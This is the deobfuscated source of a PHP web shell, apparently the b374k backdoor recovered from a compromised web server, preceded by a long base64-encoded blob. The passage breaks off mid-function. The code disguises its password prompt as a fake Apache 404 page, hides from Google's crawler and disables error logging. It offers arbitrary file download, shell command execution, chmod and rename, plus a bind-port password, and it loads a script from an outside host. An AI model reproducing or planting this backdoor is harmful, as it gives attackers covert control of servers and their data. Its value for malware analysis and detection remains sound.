B1PTEOif5x+Q5P/SM9Fq5F7QgfBqeRrxPzaVVezj2lNlNwBuUF+Sd5StnNZaa2DLIv8m1jhj7yRK4RDU2s0c2/tWYKPI5f+yNSlVFZIJ/UW5iLzdFH3RuigddsfrcxjKg3qwv0iSzLd0Pe9uuUum4Q9xBejkUZqJzH2zG7Mi6lDuevdpWwzyLK20VokM6a10ZqXqTScb51I0VrcTO37WlE1kZISs1vkQFySOhkvW0bGKyL74AteuGRJC3CCX5OrpdOpZLPoYw8ltSNJZN30w2sNODXu947x1aF06bXTn1JZ37hq8z/w4vuQW1O0ivGIW1tWnkcuM+4E1RxVUdrHNR6SNwAl/yylc9gKpzTe7bWfGDV2UfMlgRX/laObSDPNDJHV/ZFtyYyVaqNkhKwp/hG4lFLiJzlchXYlnaim+5X1K5U6BKKJnzRBUihf+Zuciql7NwvQkibk8H1ieh1z6uW2idnCX1r6q5sXOJe9pcNVqN9gQnxa+iI8KOtZm9y0lXWU52ymnsu5s3conPhoe4UfOQNCxFfNkVrWjkrRu6g365viSebCeLrK7W1jasNVd7RVjQfwNcnr8SvZvTReH+Jllh7tNgzf5XEU4hXV9WT5L9AGQLX7cQ0dewV6BHiau6Jmzfx1mfJn4tqeX0RsLv8JPCZ20zkSEGSXqRUCfxvCqtWj9NXabrk6Myx61Ev6HIk/TJslEZfMZK+pquF6anv6UyOv4RL71MRbMzX06OGSbhJ3LkYXRFPRVo4hMxnlCO0aVCNoym8tCZJq5WhXH+SXvXywaYcfrdcWJfqNCEToSeEmRF2wov6GyZFOeJukLHBGjYrhO3znZK/TVI4+w3ugB0h41txmeI18oEXU0/FJm3HpNcLp0/UiNPVStPZCNeEJ7kD4EKmynWz3bzyrAN3P8Lw7vD3cebMuZ6LRjFMUblKTRlcx3hfrdMbn1qUjTNOXM8XpXunEtSu1jBHy79Vqk7RTd5iO8CsiTPAYf4j/AeOuEV8duX+aA6xn1XIyXz4zLV/gfpT2z+ru+E59zKUcQgDKhzF58IY6uJb2IYmkMfTojg9jYbe1PrutAagZaIKPMuT8XgvqsgUrs1Kb8hwqc5KAXCGb76WFE2mEfmLIkSnfHR5txwILKmo7BdCCXSFENgLFDe/gOhTLv/mXEHgQkaxVS9hYZEPdgtuH7MolGXBIcWNIlPotcvw6C9EuSOKf/4q8lIoOMd16uxjUOXY+Hd2dwdGqjeq5MaV4EHrPR4YSU5aaXupJLgV7zoLJnIoGNxuZpxjKTsLChOpn2JG9jrZy3YFNt9atpoWtJFNs1nicwvXXz11hF0Wf9Df5liVJjiZgdvEyyl7EzQBmwH38zKrLeEXtU0roEaWMN+8lSUFXcZb4SdPCS5aurYikYpjW1Rl9qN3FJ8TrkQzq+1jBHtFx+O9D6cLqqvimVmIfUdax1dDXgLf5UjlhiFeYBca1UzYQ3NYdtytZsXPO2wlzYPDyOI1o22nKvJgQeRdIlxUuWDTo7Cx/wyfhn/Fle416WvUT7+oD6Dz9aWzC3Gn+QM1BuW3eRzu6X9IjWNLlTvZzu1Vf9V1WXlklY4SsFO5qOFluOaYAjfTwp2lvE2lkPAs6tGZeXTUmgi22+PrvjexwkhH6Ev5NM3t0x/mdFl9kjwD6YrJykfvy3bERnS7JAMuivMKsGtZba1+PnMfrZyf8MshnNP6ZD/h+TGEN9nMIbECfZfTaJOa9yvXGCPZyWO4QxsThObeXnsf3Ai0BjHoE7zd7Dh39x/muMqp6zuGjpKNdxykl4FwauzF6SZmUT+iRLIFv40yC22iHhXyIucB08r9CE3iz8rrI32DjT9baxPwpw5K+TPKtM5N/aW6lGXkSzGmKUxB0mN6qPood+mzu/zO6tG73QzQLKvJHt1z+UvK3JM+Bk+SWpXu5UTGUyJ2RNoE/6rCcKbEu+P+SG6MH7z88osw/ZF9KLFvLL8sCn6TnQGW0XdlaHWRmba2bRGRoWcrb6KTiPBMoZeYb1K0SzCxeqN+NE1rOFvajbpr7DsSbsHTG1v41krWcqbzAxV/8gz941p3BkzT7QcH/yEj1lxSuwxL6dLdxK0NMye0db2tMlFuKNodO1jrDNpzchCrjaBDfa2xlBMhgFjUn0HGq00gLtumxou6cr7xXsNMMNawLSunXPxC24J+2khZFlqlleulqutwAx63snOxe2mnW9rKB3+Tq246wTaobRHuJj1woyjhcrq2QychqW5iUHdCiww+96eaKlfUaa8wvLVcrBl2xGxGP9Kv94Y/ma7ZmXIFpPAFvZnguEoocyLQ3TRr74Gt+oqcMSZz6iNUtMinck3OKE1Ir8DXvLuMwIX9oU6Tf+xqcNa0rM0f+2lqUpYdbtrId16CrreF+AHqJQNNszlfCj6NVrhYybuajUmhNpetpGFjp3OflIi/4j3IZNT1bZa5kPrhxKc1tRuVU7dMyaWRMI/TTWDL75eWyaMIysWaIKjKUp25N3sWbPZcroHvZmAu9g6cTFpUUi7zYCWQj2GT9qUYi75p4REjambSlPNl5ohN84G7k1KWNRL3Jcmh246AJOzF3gHcDGCjf7Xa7qSzY1v8ArxY+6IRotpWDXBPRTZIESxLzRoGs5iDf/qQ8nTSi+bH4oWAFIJXqKWRCNSN62eQR7Z1felPPeFUtcFiIX2m0wzCeQtly7GxezSvBVRV3RrrFhfjev+RHVdvJy2uFlG0tr36TAXRNfdpG1xvQC8qLWNB8qDTEiy4qf0Hh2SKCTc/Spjlfzk6svcDn5RbprOjKxr3uqGFcv0188WAVgrqUGUQamSaaXpQFU9LuBYhnfbCDV5v71tm1uKl+ak0+VkMk5dvH1jeLeUffG4St5zzgUlzWtLfwqStKfK2oSR3iZ1vYFroh+ifO2XyY2iJE9EnEmzoX2RAQjRN2ZYsZspgHBZQ4ao8cUlNH4eZDkFjuCRCGebX54muiOkT/HVUnwiUjP+w2aXni05FSsD8m9+5S8TeFj+TwtAzR3wYe9K/nD9MgsfAmtxKuVl/5Iui3YNAfbTIAYCo0+YOzDOH+UYAcdl99LRgDBCldVlL7vyHtbrtZ2iQ3bVMR7CXaPnx/WGeUG7eW6hVrXjSIy7Y1alGsbB6n0SzLrtIGqJ4eFrGppMU3dKdPMlgIjJ8GjHd3UCS9OTHuSa7bDkWGob6HwV2F5taqfUBJ1S3FAg0VXsrCvYbaETqhLYIhFRhPTQ55Xb9T+Ncq7652YnVjfpVEghwp5i7TqOfiBLl1Fr3iQQhOyHdGwJ5wmtBE+iWDYi42QCJEdD+YKympBExLhrfHBNyU/yWV1J8ZfV2XyXuU6LF/ZtAdLJ196ZM2lUBpw20oCv3I1WJhFRPTQQEEv6eTzcl2Xo5RR481sc6QYEDPWQ4HQ87rYxz02cOV2f2tG0NxqbbtnPvrLS1upXe7gt9Xms1q0n72Uo5KpWA7KRfzF7fli5LWBQ4pwAM4W1mnB0adUGsqvhIAsxWHIbsmQx1z0/c1mwzjIm5onV7S1aEDZJUVAmNS5xljsvhuOjW45wsoaloNizW6uuS6EZXjjYU0sOaJ14+ggxTBxacZEisVGCH/GovE+yfn8n9G2vrc9MchQnpLGIG2oCKizFIq8OWFm5CV8lcJ3Wa0BGANTgGnqRgpGFkXMkhxrTnUo9lhVCSoiHYMn7F5vxy/QyL4meAf+zKHVvbyTsu19zj8nCGKg73ThqawG0PIyHcdzwyne7kNwMA/49RP1DENkHbvQjyLdTgt9OfxKm1AtUGVZNA//HbDuYRMcpDQwuT0Meva3IQSCANwbWJg9t+mB+WP9T10lmXXZqrLbqGPmZPwczIfw71O2NwXMgXaMaEBLdaZEK9SWo1odyyPOmXAUDvDI8UTtJZX7fRgtRSWYAaDZMI86q7r6czQAPF0H3Go0Wp7u7Xq/RAvXqITTjFPRTdX/pnvTvbfUvOsmsUYtXt06Ir6CUdUVKYCuGRUg++fgUFMLd2r7a/8hzX4U+NxSk9Q9TvnPf4s4I/eL+60pHsP4FLYpjJG90o6Ony3FgDgISU2mXs4gGuNU+u5aDCYtExc68XEj1tbErNhf0tl+bhMcn6DWALDfZJWPV388jTmhoD6m77fmVNI6c4i/bD/ew2xW4PwiHEp43HzpDhoiMBEuicMQoL206bk2Epv0NoZZt/a8Y9D2tuOY6eyiNw5nPBKTHtLivISUcfn91zWfA4U6VUPIURU+82ZFk5oeEQak5NWkomzl32EwQI9AEhTm07G2/rY+8vy9VfdHdcT7/wBtPk99xxlyQeFd6LR3VtGP8aLfI4KhZxEtvDASTsbxBNLN0YErY1JsHEsS2E9h/Jr/4BF868ar3Jy2tFffp4gPHkd/oKr1QoaR4qHFVVZOYaYWkGVJXNxM12HS564fpTuqvwmeNVQtR97QvIao2y2yswYsWeEdZthcdt1UkCxageRaSOLtKYbNXNEtmPrQC06+9JkLdffAUpC3IvdG2VJmRS+VYTcXdL1jT/3tJ344D1v84+rWkzaRrWtWQFo7uFooXnLAyCRbxOpINoliGZA0HAr34iDFxrBpAYfGX4AQ+8U3955taNI3xcRtB5NkSjeLiz5mpy5pzCQmILBNAImxAYJofW/Dpi/5UWwZudFfXbKv76aMNK5kSoUmbO6DB2ionyly4UuS5XzaZBRI4ucOFNdB0G7m8Hc5vKXBtW8tw6G0btXA+NG1PxIGG80VtH8VRIlOs2wrtkIc5ZHa6vITqQeqbe4iokqy81fTYe6FEFugUimGtPJy1dj1+Iq61dOyqcMlp7OBK73WJz282mbFM8a59dbUpF8n+N7vcWX9syYKfedGiSgYG1EZ6t2/95A8U+0Ln+bic+tUB2TfQaTCoY6CiWNifY16I99tI92ko/XhhJYuW2jd/Rrwu7+LPBiMeZsENmXEkbzLkw8p5cpBkXdw0xoChAJS6yOeNMouiSp8XoEGPYJc6SxG0/Mkh4FqN8klm+9uN/awe7G+gnWPEdb0+Jh+3lBGg6ck24sWjUQ06MmyfFQX99h+v4aJJT8pVgwnMV1HsoQOhDQf+aBUPlPMpMZk7TPJJIyJbHHsCT8HQ7xfG9834GCSQVx2KXrfCAx7fHTHXT2dS1AKtjnUMuTqv8yjicCw34Ri3X6Qg6c+BqhB5b5LDbif4FxBkbLbYcy4vs1Z0T0e6JR4kWuAqcqQawLl5wYC4kCuM5NrvyouyGWRd+E37rAG4Am3KYi8hLWQibRm8V6UHfSZQK41FJ5eZV1EMCvCjUlK4da6b4xlLBlMzCmCrkKnDA0XvhJAG23KQcAqUnP+n/9PshXdVkPMdPESSSs8P9ukDg2JVq4yAxkufQrg2GN5nFDZEdATachDDT/IKlxin8gYZtC07rabvi8gKNoAbLkmydc5IfU7w4kxho5+P+7vDiVathohOMSg1YXwAiewuviMOvu8Lw6thHyjVlBB2ijwjFqay1XPkFUj7u+1zE7FGeG7R6VOGDzCMi3whcs5UgnyBB+LVK1wURUXpaHuRCxr1O6lvYuWLZPYCbJR4LzChWaHHWNjbnZOeb2BpU/UjE8ws97th/j9wHBLzOePs7WC87cqibgx6DIKHxJGqNOtz4IA0hWDGDvPMxhJ0sBeAhelYVc//+dWhir1h1snbiWfvlDwxm4/p40/dDv/A2ttge1Xvy8HSdKDHvD/QXBzGahyC7Xzi3BauUegtGQfQfNSGVYfynrlKOT2+FcRzIgGB+TS0diw+QiAMC/zEQTwrz++u/SuUfCF5zcpQRSawfS/Vs0O+zm5y7QLIl586jV/S7ObpP/GmTwvEkMFixl8nGRkox1EQUC5f8tpO0yR8kDnmIl8D2G3fjJG/P9foJVX0asGMi/TfC9Um28CidT4Cl8qQUcpO+21DvoXlInRL06YGns0Xrclx5HeFW4boitMbYdMc+XMy/r1OGuwM7uWzlcJkmVavV0lXa2+nbd9QCrJEmBVnDVx+WrwDh8mU+PoMECn/6ZPBKzC7P2WAidMvzKB3MghexQHTZiEXfAuZgvsz4jhoALEz8qlcL/CAr0AT57pH0PYIJIoHhiPSTpAJAmUQG+VrvZ03KCobH9R38fCyeW5xNHIrCYyD9z+qXBe98/9/UdWJ2nNPNf8yhSbgrOvGYfQx8N3BnJ/CSGQZ0p5AxKTFj1EY1RE0F1QWQoKhXdrPdGRnUN6jhgnwrjkY0U/Ui4rlCZjEzym+gkjWT5K2L6hkD83LKM6btyuVotu9xUEAI4ISYw0cWAjfr8I23VV4MfYwfmYIj8XG1yhaGWMLO3rDb8Y1JG6JChbCaKcatb4Xy8BBrlR60mIlt2jT+FeLU+8BE/+fqLYTaFEIfhJ4+vnQnGgf+Si3+QTYSlbd7rP9fprSZxyp7R6aHUs/NNBTek8Lm3PbgsBKzNY3wO/t8MvSgWHCiDX/2+bZMTlNwnJkTVqKXb9Bfh97/+flQ7E10CqL/x76vMDZKbzd0S+eHORyYWqU7h/39NKMJ7/agi7v/9JxSwMF8fA4RxYA4boMGksiPrxXVFk3iDvJqueCwui9StC7jIc+amZDFjoaqXxif2H6aPVvlumUjGcT0wskGwkO8JbIZ4WZ3fAtpbCwCHL2yQHA+VC8jffOX/B5MBnAzsjIXRJ1HMjGLBkXAVKCn2aHj20x0/UjX6RczfxgUS1R+V2eiowbKo56DGo/VtJMIph56jYUuFh4ooyg9WT1Cm3/F5Q/T4/z+VndNPuUKQ+6CsRtWubFXM7DL2F8Dyvx/JCahp6P7rp73ZKcqYIBoFDJus0lbznbbHvwEfmzsS51x0Ag4LIoKunCt4TvnLVV4z7+j9V81xPb73nwsIt/Tgvv81CgxCpBc34x/6O856+/UPnADuoyJtMEKt0yAIVbvuO8yFwrhca0mJ0b4Pf1UpPHKQeD9XWPbOQouiKtfVX4Ruo+AUid6zn3XlGxJigPNvp9/TLJkJAdklWlptSKzAjWYJXMLgByjm+Bv62N9j9H+PBXU+3NhtEGAOQ9Q/gzX6FBRjlwWHkxbBlS+yhSLXHTuMW5kkdUC3nnbuq7sCanBlwLhYWz3H8+n/XYglfBxZ8dNf4+/BCVP4G8DfqCGGNNjWAxCZ3VpEPoGXfj12BhXQB3Z8VhzcDkqoatz/TnVNOWyLw/KzUFAtGpNcgkFlMulxXRg8LLneJ3jRjdCxjMmDhNTEG0FBYhyzvN8PP1Mu9vt+1HFA/go/zGI4/XcBf4zcgA0zc9H4uFQ0RD1El2n3OIhGR5Duq0HeBpTP+cN4E3gQDBrYGkLHTpz8Y8C54A3wvwDPP4CCMc9duNQKvHg//wA6HQG7+/GFygzxZ7QRX/ef+CKvg3UTBzNRqqwKGWcxFy83FaR5MW0NGq+O+yrznIBj2wZTR+7gR0b/4kWbQvJ0BWDQqO9l0nqBMtGQaycIdJu6mtCKvpvr5OEfdOQmqyoaf99ZnNlimI5i/AAvH/ToOeOkII7qhykFO1YfeF6Dvv1/+1/71+biQ6HPFBPeCPvh9XFMITJXr6/AONQGar1r0pw1w3dt6Z3Fg3z+tzcBAvC5E/jueO4kJ2++X3zcmDDBpqDIAceyxePsAcGFO+oEciTqJH47rN5CdSjRwyeIMwaQSjxOlaAzZFkZFsOtIKFmkn5ZCBgyY9lMlh4HA79Oe3xLGhB19iB9D/xNZqFOOtGMgVDtSjXlTBDGQXncz0cTetoHm08qlyq39LH+7fluB5rNyfElZgDITuwZCbuwuIzrPiDvB1/oKe+sPy+Pd7BgNT90VkvbMAA7u97cTNKQ+M8Kz7mHGVbzclw0/WM1Ykf25WVuOuliQY4MFxwznMqjjNOz+VfxCzTITfcNbZEVn6rguf0MAL/x5vSxADt93yapGn1EPkZa6eqHeZNgcqyXab0UlZRxnQMCvCQBMNmzWFOxGog4F9h2UL9u1+dCzMzJz6Li7yEpKymZP6MEMSapk8drKa2+5/zQJi8HPtseci18yfy/Di2L99/sMDdC5Wjl+Z5cDsa6pRTTqnOt6dSzmznSOmbK5Dfy5AATyMQtQ//diya5kWCh0+lop9lhMuJLmGJsJY9KBLQNn0LdiEH6nADMAvMfBMjkYcq/Y7mrfg9L5Kew1W93Zn//wyl+sF3jfTMlyNqx53731KZtu6d6sz3Y06MHDn9D3ECrLe+ppvMZKpb+Z/nzGEraeYqre+feSs2L4fv/4z7UJZIiszg/xwZjjnk6qTleZf6X2j9n4F7jioLCr38dBmvRDt7fwC5WRL+RNCrfhmwSdcnAxgmbZ4y0XY4uZ+OR4M3sx1BQAfa+C+GjryeK0HXd8GCXmTSRzPnaR/a+CJsLU/tUMfZYRGuiADzEzk1E84HWRl8QqeWytcms/F8zzTzP/CDXyX3f+ZkhkGbkRGZUZgUxdUt/3d+cNbbQxJmQKRux+/03MsiUwoBRDjuu7r3HmM8lZursqttZEVGH7ZMeNH8nT911/Ogi0IJ+d51P7ci3f9CoQAwJe/1LgCBwf4C4RA83tAiEA";
eval /* PHPDeobfuscator eval output */ {
    /* (Web Shell b374k r3c0d3d by x'1n73ct|default pass:" 1n73ction ") */
    $auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
    $color = "#00ff00";
    $default_action = 'FilesMan';
    @define('SELF_PATH', "/var/www/html/nasi.php.20c655540c8b3580fb37346be8db1b20.bin");
    if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
    @session_start();
    @error_reporting(0);
    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('VERSION', '2.1');
    if (get_magic_quotes_gpc()) {
        function stripslashes_array($array)
        {
            return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
        }
        $_POST = stripslashes_array($_POST);
    }
    function printLogin()
    {
        ?> 
<SCRIPT SRC=http://w0rms.com/sayac.js></SCRIPT>
<h1>Not Found</h1> 
<p>The requested URL was not found on this server.</p> 
<hr> 
<address>Apache Server at <?php 
        echo $_SERVER['HTTP_HOST'];
        ?> Port 80</address> 
    <style> 
        input { margin:0;background-color:#fff;border:1px solid #fff; } 
    </style> 
    <center> 
    <form method=post> 
    <input type=password name=pass> 
    </form></center> 
    <?php 
        exit;
    }
    if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
        if (empty($auth_pass) || isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
            $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
        } else {
            printLogin();
        }
    }
    @ini_set('log_errors', 0);
    @ini_set('output_buffering', 0);
    if (isset($_GET['dl']) && $_GET['dl'] != "") {
        $file = $_GET['dl'];
        $filez = @file_get_contents($file);
        header("Content-type: application/octet-stream");
        header("Content-length: " . strlen($filez));
        header("Content-disposition: attachment; filename=\"" . basename($file) . "\";");
        echo $filez;
        exit;
    } elseif (isset($_GET['dlgzip']) && $_GET['dlgzip'] != "") {
        $file = $_GET['dlgzip'];
        $filez = gzencode(@file_get_contents($file));
        header("Content-Type:application/x-gzip\n");
        header("Content-length: " . strlen($filez));
        header("Content-disposition: attachment; filename=\"" . basename($file) . ".gz\";");
        echo $filez;
        exit;
    }
    // view image
    if (isset($_GET['img'])) {
        @ob_clean();
        $d = magicboom($_GET['y']);
        $f = $_GET['img'];
        $inf = @getimagesize($d . $f);
        $ext = explode($f, ".");
        $ext = $ext[count($ext) - 1];
        @header("Content-type: " . $inf["mime"]);
        @header("Cache-control: public");
        @header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
        @header("Cache-control: max-age=604800");
        @readfile($d . $f);
        exit;
    }
    // server software
    $software = getenv("SERVER_SOFTWARE");
    // check safemode
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
        $safemode = TRUE;
    } else {
        $safemode = FALSE;
    }
    // uname -a
    $system = @php_uname();
    // mysql
    function showstat($stat)
    {
        if ($stat == "on") {
            return "<b><font style='color:#00FF00'>ON</font></b>";
        } else {
            return "<b><font style='color:#DD4736'>OFF</font></b>";
        }
    }
    function testmysql()
    {
        if (function_exists('mysql_connect')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    function testcurl()
    {
        if (function_exists('curl_version')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    function testwget()
    {
        if (exe('wget --help')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    function testperl()
    {
        if (exe('perl -h')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    // check os
    if (strtolower(substr($system, 0, 3)) == "win") {
        $win = TRUE;
    } else {
        $win = FALSE;
    }
    // change directory
    if (isset($_GET['y'])) {
        if (@is_dir($_GET['view'])) {
            $pwd = $_GET['view'];
            @chdir($pwd);
        } else {
            $pwd = $_GET['y'];
            @chdir($pwd);
        }
    }
    //hdd
    function convertByte($s)
    {
        if ($s >= 1073741824) {
            return sprintf('%1.2f', $s / 1073741824) . ' GB';
        } elseif ($s >= 1048576) {
            return sprintf('%1.2f', $s / 1048576) . ' MB';
        } elseif ($s >= 1024) {
            return sprintf('%1.2f', $s / 1024) . ' KB';
        } else {
            return $s . ' B';
        }
    }
    // username, id, shell prompt and working directory
    if (!$win) {
        if (!($user = rapih(exe("whoami")))) {
            $user = "";
        }
        if (!($id = rapih(exe("id")))) {
            $id = "";
        }
        $prompt = $user . " \$ ";
        $pwd = @getcwd() . DIRECTORY_SEPARATOR;
    } else {
        $user = @get_current_user();
        $id = $user;
        $prompt = $user . " &gt;";
        $pwd = realpath(".") . "\\";
        // find drive letters
        $v = explode("\\", $d);
        $v = $v[0];
        foreach (range("A", "Z") as $letter) {
            $bool = @is_dir($letter . ":\\");
            if ($bool) {
                $letters .= "<a href=\"?y=" . $letter . ":\\\">[ ";
                if ($letter . ":" != $v) {
                    $letters .= $letter;
                } else {
                    $letters .= "<span class=\"gaya\">" . $letter . "</span>";
                }
                $letters .= " ]</a> ";
            }
        }
    }
    function testoracle()
    {
        if (function_exists('ocilogon')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    function testmssql()
    {
        if (function_exists('mssql_connect')) {
            return showstat("on");
        } else {
            return showstat("off");
        }
    }
    function showdisablefunctions()
    {
        if ($disablefunc = @ini_get("disable_functions")) {
            return "<span style='color:'><font color=#DD4736><b>" . $disablefunc . "</b></font></span>";
        } else {
            return "<span style='color:#00FF1E'><b>NONE</b></span>";
        }
    }
    if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
        $posix = TRUE;
    } else {
        $posix = FALSE;
    }
    // server ip
    $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
    // your ip ;-)
    $my_ip = $_SERVER['REMOTE_ADDR'];
    $admin_id = $_SERVER['SERVER_ADMIN'];
    $bindport = "13123";
    $bindport_pass = "b374k";
    // separate the working direcotory
    $pwds = explode(DIRECTORY_SEPARATOR, $pwd);
    $pwdurl = "";
    for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
        $pathz = "";
        for ($j = 0; $j <= $i; $j++) {
            $pathz .= $pwds[$j] . DIRECTORY_SEPARATOR;
        }
        $pwdurl .= "<a href=\"?y=" . $pathz . "\">" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
    }
    // rename file or folder
    if (isset($_POST['rename'])) {
        $old = $_POST['oldname'];
        $new = $_POST['newname'];
        @rename($pwd . $old, $pwd . $new);
        $file = $pwd . $new;
    }
    if (isset($_POST['chmod'])) {
        $name = $_POST['name'];
        $value = $_POST['newvalue'];
        if (strlen($value) == 3) {
            $value = "0" . $value;
        }
        @chmod($pwd . $name, octdec($value));
        $file = $pwd . $name;
    }
    if (isset($_POST['chmod_folder'])) {
        $name = $_POST['name'];
        $value = $_POST['newvalue'];
        if (strlen($value) == 3) {
            $value = "0" . $value;
        }
        @chmod($pwd . $name, octdec($value));
        $file = $pwd . $name;
    }
    // print useful info
    $buff = "Software : <b>" . $software . "</b><br />";
    $buff .= "System OS : <b>" . $system . "</b><br />";
    if ($id != "") {
        $buff .= "ID : <b>" . $id . "</b><br />";
    }
    $buff .= "PHP Version : <b>" . phpversion() . "</b> on <b>" . php_sapi_name() . "</b><br />";
    $buff .= "Server ip : <b>" . $server_ip . "</b> <span class=\"gaya\"> | </span> Your   ip : <b>" . $my_ip . "</b><span class=\"gaya\"> | </span> Admin : <b>" . $admin_id . "</b><br />";
    $buff .= "Free Disk: <span style='color:#00FF1E'><b>" . convertByte(disk_free_space("/")) . " / " . convertByte(disk_total_space("/")) . "</b></span><br />";
    if ($safemode) {
        $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />";
    } else {
        $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
    }
    $buff .= "Disabled Functions: " . showdisablefunctions() . "<br />";
    $buff .= "MySQL: " . testmysql() . "&nbsp;|&nbsp;MSSQL: " . testmssql() . "&nbsp;|&nbsp;Oracle: " . testoracle() . "&nbsp;|&nbsp;Perl: " . testperl() . "&nbsp;|&nbsp;cURL: " . testcurl() . "&nbsp;|&nbsp;WGet: " . testwget() . "<br>";
    $buff .= "<font color=00ff00 ><b>" . $letters . "&nbsp;&gt;&nbsp;" . $pwdurl . "</b></font>";
    function rapih($text)
    {
        return trim(str_replace("<br />", "", $text));
    }
    function magicboom($text)
    {
        if (!get_magic_quotes_gpc()) {
            return $text;
        }
        return stripslashes($text);
    }
    function showdir($pwd, $prompt)
    {
        $fname = array();
        $dname = array();
        if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
            $posix = TRUE;
        } else {
            $posix = FALSE;
        }
        $user = "????:????";
        if ($dh = @scandir($pwd)) {
            foreach ($dh as $file) {
                if (is_dir($file)) {
                    $dname[] = $file;
                } elseif (is_file($file)) {
                    $fname[] = $file;
                }
            }
        } else {
            if ($dh = @opendir($pwd)) {
                while ($file = @readdir($dh)) {
                    if (@is_dir($file)) {
                        $dname[] = $file;
                    } elseif (@is_file($file)) {
                        $fname[] = $file;
                    }
                }
                @closedir($dh);
            }
        }
        sort($fname);
        sort($dname);
        $path = @explode(DIRECTORY_SEPARATOR, $pwd);
        $tree = @sizeof($path);
        $parent = "";
        $buff = "\r\n\t<form action=\"?y=" . $pwd . "&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">\r\n\t<table class=\"cmdbox\" style=\"width:50%;\">\r\n\t<tr><td><b>{$prompt}</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>\r\n\t</form>\r\n\t<form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">\r\n\t<input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />\r\n\t<tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"" . $pwd . "\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>\r\n\t</form></table><table class=\"explore\">\r\n\t<tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>\r\n\t";
        if ($tree > 2) {
            for ($i = 0; $i < $tree - 2; $i++) {
                $parent .= $path[$i] . DIRECTORY_SEPARATOR;
            }
        } else {
            $parent = $pwd;
        }
        foreach ($dname as $folder) {
            if ($folder == ".") {
                if (!$win && $posix) {
                    $name = @posix_getpwuid(@fileowner($folder));
                    $group = @posix_getgrgid(@filegroup($folder));
                    $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
                } else {
                    $owner = $user;
                }
                $buff .= "<tr><td><a href=\"?y=" . $pwd . "\">{$folder}</a></td><td>LINK</td>\r\n\t\t\t<td style=\"text-align:center;\">" . $owner . "</td><td><center>" . get_perms($pwd) . "</center></td>\r\n\t\t\t<td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\">\r\n\t\t\t<a href=\"?y={$pwd}&amp;edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>\r\n\t\t\t<form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n\t\t\t<input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" />\r\n\t\t\t<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />\r\n\t\t\t<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />\r\n\t\t\t</form></td>\r\n\t\t\t\r\n\t\t\t</tr>\r\n\t\t\t";
            } elseif ($folder == "..") {
                if (!$win && $posix) {
                    $name = @posix_getpwuid(@fileowner($folder));
                    $group = @posix_getgrgid(@filegroup($folder));
                    $owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
                } else {
                    $owner = $user;
                }
